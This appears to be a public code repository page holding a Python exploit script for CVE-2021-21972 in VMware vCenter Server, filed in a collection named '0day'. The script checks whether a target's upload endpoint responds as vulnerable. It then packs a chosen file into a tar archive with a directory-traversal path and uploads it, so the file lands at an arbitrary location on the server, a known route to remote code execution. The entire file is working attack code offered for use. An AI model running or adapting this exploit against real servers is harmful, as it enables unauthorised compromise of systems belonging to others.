admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
0day/14-VMware/VMware vCenter Server RCE/CVE-2021-21972/CVE-2021-21972_2.py
helloexp 3759341ce1 add VMware 多个rce exp
2023-02-28 16:34:18 +08:00

62 lines
2.3 KiB
Python
Raw Blame History

#!/usr/bin/python3
import argparse
import requests
import tarfile
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'
def check(ip):
r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
if r.status_code == 405:
print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
return True
else:
print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
return False
def make_traversal_path(path, level=5, os="unix"):
if os == "win":
traversal = ".." + "\\"
fullpath = traversal*level + path
return fullpath.replace('/', '\\').replace('\\\\', '\\')
else:
traversal = ".." + "/"
fullpath = traversal*level + path
return fullpath.replace('\\', '/').replace('//', '/')
def archive(file, path, os):
tarf = tarfile.open('exploit.tar', 'w')
fullpath = make_traversal_path(path, level=5, os=os)
print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
tarf.add(file, fullpath)
tarf.close()
print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')
def post(ip):
r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
if r.status_code == 200 and r.text == 'SUCCESS':
print('[+] File uploaded successfully')
else:
print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
parser.add_argument('-f', '--file', help='The file to tar')
parser.add_argument('-p', '--path', help='The path to extract the file to on target')
parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
args = parser.parse_args()
vulnerable = check(args.target)
if vulnerable and (args.file and args.path and args.operating_system):
archive(args.file, args.path, args.operating_system)
post(args.target)
Reference in New Issue View Git Blame Copy Permalink